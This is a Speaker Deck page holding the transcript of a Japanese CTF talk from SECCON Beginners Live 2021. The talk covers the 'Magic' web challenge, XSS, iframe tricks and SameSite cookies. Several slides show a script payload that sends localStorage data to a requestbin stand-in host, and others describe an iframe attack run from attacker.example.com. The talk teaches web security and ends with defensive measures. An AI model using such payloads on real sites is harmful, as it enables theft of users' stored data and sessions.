Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Magicで学ぶWebセキュリティ - SECCON Beginners Live 2021
Search
Hi120ki
October 17, 2021
Technology
0
1.1k
Magicで学ぶWebセキュリティ - SECCON Beginners Live 2021
SECCON Beginners Live 2021 発表スライド
https://connpass.com/event/225707/
Hi120ki
October 17, 2021
Tweet
Share
More Decks by Hi120ki
See All by Hi120ki
MCPの認証と認可 - MCP Meetup Tokyo 2025
hi120ki
16
9.7k
運用して初めてわかったDevinのセキュリティ課題 - Devin Meetup Tokyo 2025
hi120ki
11
6.7k
SECCON13 - SECCON Beginners Workshop - Reversing
hi120ki
0
150
Reversing基礎編 / Basics of Reversing - SECCON Beginners Live 2022
hi120ki
5
2.1k
CTF大会開催はいいぞ。- 魔女のお茶会 2021冬 / Guide for holding CTF events
hi120ki
2
1.5k
Other Decks in Technology
See All in Technology
新卒QAエンジニアの成長戦略
qatonchan
0
300
データエンジニアがこの先生きのこるには...?
10xinc
0
400
非同期処理実行基盤 Delayed脱出 → Solid Queue完全移行への旅路。
srockstyle
3
1.2k
PLaMo2シリーズのvLLM実装 / PFN LLM セミナー
pfn
PRO
2
610
Goに育てられ開発者向けセキュリティ事業を立ち上げた僕が今向き合う、AI × セキュリティの最前線 / Go Conference 2025
flatt_security
0
250
業務自動化プラットフォーム Google Agentspace に入門してみる #devio2025
maroon1st
0
170
Findy Team+のSOC2取得までの道のり
rvirus0817
0
230
入門 FormObject / An Introduction to FormObject #kaigionrails
expajp
2
1.4k
C# 14 / .NET 10 の新機能 (RC 1 時点)
nenonaninu
1
1.1k
analysis パッケージの仕組みの上でMulti linter with configを実現する / Go Conference 2025
k1low
1
240
about #74462 go/token#FileSet
tomtwinkle
1
260
20250929_QaaS_vol20
mura_shin
0
110
Featured
See All Featured
XXLCSS - How to scale CSS and keep your sanity
sugarenia
248
1.3M
Statistics for Hackers
jakevdp
799
220k
The Cult of Friendly URLs
andyhume
79
6.6k
Measuring & Analyzing Core Web Vitals
bluesmoon
9
600
Easily Structure & Communicate Ideas using Wireframe
afnizarnur
194
16k
Mobile First: as difficult as doing things right
swwweet
224
9.9k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
285
14k
Designing Dashboards & Data Visualisations in Web Apps
destraynor
231
53k
Building Flexible Design Systems
yeseniaperezcruz
329
39k
Dealing with People You Can't Stand - Big Design 2015
cassininazir
367
27k
Let's Do A Bunch of Simple Stuff to Make Websites Faster
chriscoyier
507
140k
Helping Users Find Their Own Way: Creating Modern Search Experiences
danielanewman
30
2.9k
Transcript
Magic Web SECCON Beginners Live 2021 hi120ki
@hi120ki CTF Wani Hackase Web Reversing 2 2021 Reversing :
firmware Web : json, magic
Web Magic 3
Magic [Web Hard] : 31solve Web 5 • • 4
5 /
6 /
7 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...
8 / URL
9 /
10 crawler/index.js puppeteer Node.js Chrome URL
11 2. FLAG 3. URL crawler/index.js 1.
12 FLAG nginx/html/static/index.js FLAG
13 FLAG JavaScript XSS( )
XSS 14 HTML Web HTML JavaScript Cookie Web
15 https://magic.quals.beginners.seccon.jp/ FLAG FLAG
16 https://magic.quals.beginners.seccon.jp/?????????? FLAG FLAG <script>…</script>
17 FLAG <script>…</script> FLAG https://magic.quals.beginners.seccon.jp/??????????
18 <script> fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo"))); </script> FLAG XSS URL
XSS 19 magic/views/index.ejs <script> </script>
20 alert(1)
21 FLAG URL <script> fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo"))); </script>
22 FLAG URL
23 XSS https://magic.quals.beginners.seccon.jp/
24 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ ✕ XSS
25 ... + = ? XSS
26 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ URL <script>…</script> FLAG
27 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...
28 URL
29 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ <script>…</script> FLAG XSS
30 FLAG 1. FLAG 2. 3.
31
1. XSS 2. 3. 32
1. XSS 2. 3. 33 FLAG
1. XSS 2. 3. 34
1. XSS 2. 3. 35
36 FLAG
XSS • • Byte Bandits CTF 2020 Notes App •
https://github.com/ByteBandits/bbctf-2020 37
Byte Bandits CTF 2020 Notes App 38 https://example.com/login?username= &password= •
FLAG iframe • • API
iframe 39 https://attacker.example.com/ iframe1 iframe2 URL iframe https://example.com/ https://example.com/ URL
iframe
iframe 40 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ iframe 2 iframe
iframe 41 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG <script>...</script> XSS
FLAG
iframe 42 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG FLAG (top.iframe1.document.body.innerHTML)
<script>...</script>
43 iframe SameSite Cookie None Lax
44 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=None iframe Cookie Cookie (session=nj49gn...)
FLAG
45 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=Lax iframe Cookie Cookie (session=nj49gn...)
FLAG
SameSite Cookie=Lax 46 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ Cookie Cookie
(session=nj49gn...) ✕ FLAG <script>...</script>
47 SameSite Cookie=None iframe CTF
48 Cookie : SameSite, HttpOnly, Secure... Content-Security-Policy X-Frame-Options ... (
XSS Content-Security-Policy )
49 FLAG +
50 Magic https://github.com/SECCON/Beginners_CTF_2021/tree/main/web/magic/files Freepik from Flaticon https://www.flaticon.com/free-icon/hacker_924874 https://www.flaticon.com/free-icon/programmer_560216 https://www.flaticon.com/free-icon/flag_473724 writeup
https://hi120ki.github.io/blog/posts/20210523-3/